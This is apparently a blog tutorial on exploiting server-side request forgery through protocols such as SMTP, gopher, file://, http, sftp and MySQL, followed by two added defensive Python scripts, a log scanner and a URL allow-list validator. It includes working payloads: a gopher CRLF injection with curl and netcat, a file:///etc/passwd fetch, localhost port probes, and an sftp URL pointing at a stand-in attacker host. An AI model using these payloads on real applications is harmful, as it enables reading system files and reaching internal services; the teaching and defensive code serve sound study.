Protocols and their types
Hey folks, what's up? Hope you are doing well in the pandemic. First of all, I want to apologize for writing this article late; I was busy making a project in Python 3. I will release my tool soon, stay tuned. I am not here to advertise my tool XD, nor are you here to see my advertisement.

In this section I will cover protocol exploitation with SSRF. We can exploit protocols like gopher, http, mysql, intranet, smtp etc. to attack a web application, steal data and abuse the application. This section and the upcoming ones are going to be at an advanced level of SSRF; if there is any SSRF concept you are unsure about, clear it up via the previous two parts before diving into exploiting protocols.

Let's first clear up the basic definition and working of these protocols. There are lots of protocols, but as you know I hate long articles, so I cover only the main protocols' definitions and leave the rest for you to research :)

Protocols And Their Types

Basically, what are protocols? Protocols are nothing but a set of rules for exchanging data. There are many protocols in use: for transferring files (FTP), for mailing (SMTP), for calling (VoIP) etc. Since this article is about exploiting SSRF, we will talk about those protocols which are abused via SSRF to exploit a web application.
Exploitation
Let's break these protocols with the help of SSRF ^_^

SMTP (Simple Mail Transfer Protocol) - for sending and receiving email. Thanks to this guy we have a unique way of exploiting SMTP:

Probably an obvious SSRF trick for pros but I just figured out :)
1. Connect with SSRF on SMTP localhost:25
2. From the first line get the internal domain name: 220 http://blabla.internaldomain.com ESMTP Sendmail
3. Search http://internaldomain.com on GitHub, find subdomains
4. Connect
There are various other techniques for exploiting SMTP, like creating a payload, hosting it on a server and then sending the mail; you can read this awesome article.
- Gopher -
As we all know, gopher is a very old protocol used for fetching files from a web server. It has got very, very old since it is not used in a wide number of applications, but with SSRF we can exploit gopher and http. As I said in the previous article, unsanitized data leads to file fetching, but why are the files fetched? Just because of these protocols.
Gopher exploitation is very vast: we can exploit http, redis, telnet, ftp and many more. Here is an awesome tool which creates payloads for these protocols. We can't cover all of gopher exploitation in this article because it won't be possible; if I were to cover it all, it would take very much time and the article would get longer and longer. I will explain all exploitation techniques on gopher separately in the next article. In this article I will depict basic exploitation of gopher; if you want to learn advanced-level gopher exploitation you can read it here.
```
# terminal 1: start a listener on port 2222
$ nc -lvvp 2222
listening on [any] 2222 ...
connect to [127.0.0.1] from localhost [127.0.0.1] 34116
ello gopher

# terminal 2: send the request through the gopher scheme
$ curl gopher://localhost:2222/hello%0agopher
```

That's how we do basic-level exploitation of gopher with CRLF (carriage return and line feed). Note that the first character after the slash (the "h") is consumed as the gopher item type, so the listener receives "ello", a newline, and "gopher": whatever we put after the type character is written to the socket as raw bytes, newlines included. We can use gopher to exploit mysql, redis, http, smtp and so on; I will show and explain every technique in a unique article dedicated to gopher exploitation.
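From the defender's side, the gopher/CRLF trick above leaves a recognisable trace in the web server's access log: a url= or fetch= parameter whose value is a non-http scheme, an internal host, or a value with an encoded newline in it. The following Python script is an added example, not part of the original article; it scans a few constructed Common Log Format lines (made up for this example, using only the hosts and schemes discussed on this page) for exactly those signs, using only the standard library.

```python
import ipaddress
import re
from urllib.parse import parse_qsl, unquote, urlsplit

# Constructed access-log lines (not from the article). The first and last are
# benign; the middle three carry url/fetch parameters of the kinds discussed above.
SAMPLE_LOG = """\
10.0.0.5 - - [10/Oct/2021:13:55:36 +0000] "GET /fetch?url=https%3A%2F%2Fexample.com%2Ffeed HTTP/1.1" 200 512
10.0.0.9 - - [10/Oct/2021:13:55:40 +0000] "GET /fetch?url=gopher%3A%2F%2Flocalhost%3A2222%2Fhello%250agopher HTTP/1.1" 200 17
10.0.0.9 - - [10/Oct/2021:13:55:44 +0000] "GET /fetch?url=http%3A%2F%2Flocalhost%3A25%2F HTTP/1.1" 200 80
10.0.0.9 - - [10/Oct/2021:13:55:50 +0000] "GET /fetch?fetch=file%3A%2F%2F%2Fetc%2Fpasswd HTTP/1.1" 200 1200
10.0.0.7 - - [10/Oct/2021:13:56:01 +0000] "GET /static/logo.png HTTP/1.1" 200 3000
"""

ALLOWED_SCHEMES = {"http", "https"}
# Common Log Format: client address first, then the quoted request line.
LOG_RE = re.compile(r'^(?P<client>\S+) .*?"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+"')


def is_internal_host(host):
    """True for localhost and for IP literals in loopback/private/link-local space."""
    if not host:
        return False
    host = host.lower().rstrip(".")
    if host == "localhost":
        return True
    try:
        ip = ipaddress.ip_address(host)
    except ValueError:
        return False            # other hostnames would need DNS, which a log scan does not do
    return ip.is_loopback or ip.is_private or ip.is_link_local or ip.is_reserved


def classify_value(value):
    """Findings for one already-decoded query-parameter value; [] when benign."""
    findings = []
    parts = urlsplit(value)
    if not parts.scheme:
        return findings         # not a URL, nothing to judge
    if parts.scheme.lower() not in ALLOWED_SCHEMES:
        findings.append("scheme:" + parts.scheme.lower())
    if is_internal_host(parts.hostname):
        findings.append("internal-host:" + parts.hostname.lower())
    # A newline may be literal after the web server's decode, or still percent-encoded
    # (%0a) so that the fetcher decodes it a second time, as in the gopher payload above.
    if re.search(r"[\r\n]", value) or re.search(r"[\r\n]", unquote(value)):
        findings.append("crlf-injection")
    return findings


def scan_log(text):
    """Return one alert dict per query parameter that looks like SSRF abuse."""
    alerts = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        query = urlsplit(m.group("target")).query
        for name, value in parse_qsl(query, keep_blank_values=True):
            findings = classify_value(value)
            if findings:
                alerts.append({"client": m.group("client"), "param": name,
                               "value": value, "findings": findings})
    return alerts


if __name__ == "__main__":
    for alert in scan_log(SAMPLE_LOG):
        print(f"{alert['client']} {alert['param']}={alert['value']!r}: "
              f"{', '.join(alert['findings'])}")
```

The script deliberately checks the decoded value twice for newlines, because the interesting payloads are double-encoded: the client encodes the whole URL once for the query string, and the `%0a` that survives that decode is what the server-side fetcher turns into a real line break. It does not resolve hostnames, so a public-looking name that points at an internal address is only caught at request time by a resolving validator, not by a log scan.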
3. file:// - basically it fetches files from local or external resources; we can exploit it by replacing a file with our payload: www.justfortest.com?php?fetch=file:///etc/passwd. It will show the content of the /etc/passwd file, which contains the system IDs of the admin and users.
4. HTTP (Hypertext Transfer Protocol) - I don't think it's a topic that needs explaining XD. Let's come to exploitation: www.justfortest.com?php?url=http://localhost:21 will fetch the content served on localhost (port 21) to the hacker.
5. SFTP (Secure File Transfer Protocol) - protocol used for sending files securely: www.justfortest.com?url=sftp://evul.com:3333
6. MySQL - the protocol used between the MySQL client and server. Well, I can't explain it better than this; read this article.

That's all for today. I covered the various protocols for exploiting with the help of SSRF. In the next article I will do chaining of SSRF with critical and some low-level bugs. If there is any mistake or I forgot to mention any important protocol, let me know in the comments :)
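All of the protocol tricks on this page (SMTP on localhost:25, gopher with CRLF, file://, http://localhost:21, sftp://, mysql) share one root cause: the application hands a user-controlled URL to a fetcher that speaks every scheme and can reach every host. The following Python validator is an added example, not code from the article or from any tool it links to, of the allow-list policy that closes all of them at once: only http/https, only ports 80/443, no credentials in the URL, and every address the host resolves to must be public. `FAKE_DNS`, `fake_resolver`, the justfortest.com names and the IP mappings are constructed so the demo runs offline; in production `validate_fetch_url` is called with the default `socket.getaddrinfo`.

```python
import ipaddress
import socket
from urllib.parse import urlsplit

# Policy for a server-side "fetch this URL for me" feature: only web schemes,
# only default web ports, and only destinations that resolve to public addresses.
ALLOWED_SCHEMES = {"http", "https"}
ALLOWED_PORTS = {80, 443}


class UnsafeURL(ValueError):
    """Raised when a user-supplied URL fails the SSRF policy."""


def is_public_address(ip):
    return not (ip.is_private or ip.is_loopback or ip.is_link_local
                or ip.is_multicast or ip.is_reserved or ip.is_unspecified)


def validate_fetch_url(url, resolver=socket.getaddrinfo):
    """Check a URL against the policy and return the public IPs it resolves to.

    `resolver` has getaddrinfo's signature so the demo can inject a fake one."""
    parts = urlsplit(url)
    scheme = parts.scheme.lower()
    if scheme not in ALLOWED_SCHEMES:          # rejects gopher://, file://, sftp://, ...
        raise UnsafeURL(f"scheme '{scheme}' not allowed")
    if not parts.hostname:
        raise UnsafeURL("missing host")
    if parts.username or parts.password:
        raise UnsafeURL("credentials in URL not allowed")
    try:
        port = parts.port
    except ValueError as e:
        raise UnsafeURL("malformed port") from e
    port = port or (443 if scheme == "https" else 80)
    if port not in ALLOWED_PORTS:              # rejects http://localhost:21, :25, :3306, ...
        raise UnsafeURL(f"port {port} not allowed")
    # Resolve the name and inspect every address it maps to: a public-looking
    # hostname that points at 127.0.0.1 or 10.0.0.0/8 is as dangerous as a literal.
    try:
        infos = resolver(parts.hostname, port, proto=socket.IPPROTO_TCP)
    except socket.gaierror as e:
        raise UnsafeURL(f"cannot resolve {parts.hostname}") from e
    addresses = {ipaddress.ip_address(info[4][0]) for info in infos}
    for ip in addresses:
        if not is_public_address(ip):
            raise UnsafeURL(f"{parts.hostname} resolves to non-public address {ip}")
    return sorted(str(ip) for ip in addresses)


def check_url(url, resolver=socket.getaddrinfo):
    """Convenience wrapper: 'allowed' or 'blocked: <reason>'."""
    try:
        validate_fetch_url(url, resolver)
        return "allowed"
    except UnsafeURL as e:
        return f"blocked: {e}"


# Constructed DNS table so the example runs offline (these mappings are made up).
FAKE_DNS = {
    "example.com": ["93.184.216.34"],
    "localhost": ["127.0.0.1"],
    "intranet.justfortest.com": ["10.0.0.12"],
}


def fake_resolver(host, port, proto=0):
    """getaddrinfo stand-in backed by FAKE_DNS; IP literals resolve to themselves."""
    try:
        ips = [str(ipaddress.ip_address(host))]
    except ValueError:
        if host not in FAKE_DNS:
            raise socket.gaierror(f"constructed resolver has no entry for {host}")
        ips = FAKE_DNS[host]
    return [(socket.AF_INET, socket.SOCK_STREAM, proto, "", (ip, port)) for ip in ips]


if __name__ == "__main__":
    for candidate in ["https://example.com/feed", "gopher://localhost:2222/hello%0agopher",
                      "file:///etc/passwd", "sftp://evul.com:3333", "http://localhost:21",
                      "http://intranet.justfortest.com/", "http://127.0.0.1/"]:
        print(f"{candidate:45} -> {check_url(candidate, fake_resolver)}")
```

Two caveats for using this in a real fetcher: connect to the addresses the validator returned rather than resolving the name a second time, otherwise the answer can change between the check and the connection; and either disable redirects or run every redirect target through the same validator, since a public host can redirect the fetcher straight back to localhost.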